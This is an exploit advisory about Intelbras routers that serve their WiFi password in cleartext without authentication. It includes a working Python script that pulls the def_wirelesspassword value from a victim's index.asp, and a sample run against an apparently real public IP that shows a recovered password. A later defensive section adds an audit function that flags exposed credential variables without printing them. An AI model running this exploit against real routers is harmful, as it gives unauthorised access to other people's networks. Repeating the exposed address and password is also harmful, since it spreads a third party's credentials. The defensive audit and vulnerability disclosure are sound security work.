Intelbras Roteadores – Remote WiFi Password Disclosure (Authentication Bypass)

2020.02.09
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Title: Intelbras Roteadores – Remote WiFi Password Disclosure
Date: 2020-02-09
Author: Nir Yehoshua
Vendor Homepage: http://intelbras.com.br/
Vulnerable Routers: KLR 300N, N WRN240 Slim, N WIN300 and N WRN342 Slim.

Details:
The following routers: KLR 300N, N WRN240 Slim, N WIN300 and N WRN342 Slim from Intelbras (Brazilian company) are saving the password in cleartext without any encryption/hashing algorithm.
An attacker can send an HTTP request to the router and get the password.

####################
Python code:

import requests
print 'Remote WiFi Password disclosure, Please enter the victim address: (Use http / https://<IP>:PORT/index.asp)'
user_input = raw_input("> ")
checker = requests.get(user_input)
if 'def_wirelesspassword' in checker.content: # The password variable
    print "Vulnerable"
    details = checker.content.split("def_wirelesspassword")[1].split('\n')[0].replace('= "','').replace('";','') # Quick and dirty split method
    print 'wifi password is:',details
else:
    print "Not Vulnerable"
    exit()

Example usage:

Remote WiFi Password disclosure, Please enter the victim address: (Use http / Https://<IP>:PORT/index.asp)
> http://77.70.110.152:8080/index.asp
Vulnerable
wifi password is: 0896676565
####################

List of vulnerable devices:
And more than 1,500 over the globe.
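
A defender-side check for the exposure described above, added here as an example and not part of the original advisory: it inspects a saved copy of the admin page from a router you administer and reports secret-bearing JavaScript variables without printing their values. Only the name def_wirelesspassword comes from the advisory; the function names, the variable-name heuristic and the sample page bodies are assumptions constructed for illustration, and the check goes beyond the single variable by flagging any password-like assignment.

```python
import re

# Assumption: secrets appear in the page as JavaScript assignments such as
#   def_wirelesspassword = "value";
# The name pattern is a heuristic chosen for this example.
ASSIGNMENT = re.compile(r'''\b(?:var\s+)?([A-Za-z_]\w*)\s*=\s*(["'])(.*?)\2\s*;''')
SECRET_NAME = re.compile(r'pass|pwd|psk|wpa|wep|key', re.IGNORECASE)


def find_exposed_secrets(body):
    """Return [(variable, value_length)] for non-empty secret-like assignments.

    Values are never returned, so the report can be logged or shared.
    """
    findings = []
    for name, _quote, value in ASSIGNMENT.findall(body):
        if SECRET_NAME.search(name) and value:
            findings.append((name, len(value)))
    return findings


def audit(body, authenticated):
    """Classify a saved admin-page response from a device you administer."""
    findings = find_exposed_secrets(body)
    if not findings:
        return "OK: no credential variables in page"
    names = ", ".join(name for name, _ in findings)
    if authenticated:
        return "WARN: cleartext credentials rendered after login: " + names
    return "FAIL: cleartext credentials served without login: " + names


# Constructed sample bodies (not captured from a real device).
SAMPLE_LEAKY = '''<script>
var def_ssid = "HomeNet";
def_wirelesspassword = "example-passphrase";
var wan_mode = "dhcp";
</script>'''
SAMPLE_CLEAN = '<script>var def_ssid = "HomeNet";</script>'

if __name__ == "__main__":
    print(audit(SAMPLE_LEAKY, authenticated=False))
    print(audit(SAMPLE_CLEAN, authenticated=False))
```

A FAIL result on a page fetched without a session means the device should be taken off any WAN-reachable management port and the WiFi passphrase rotated once the exposure is closed.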

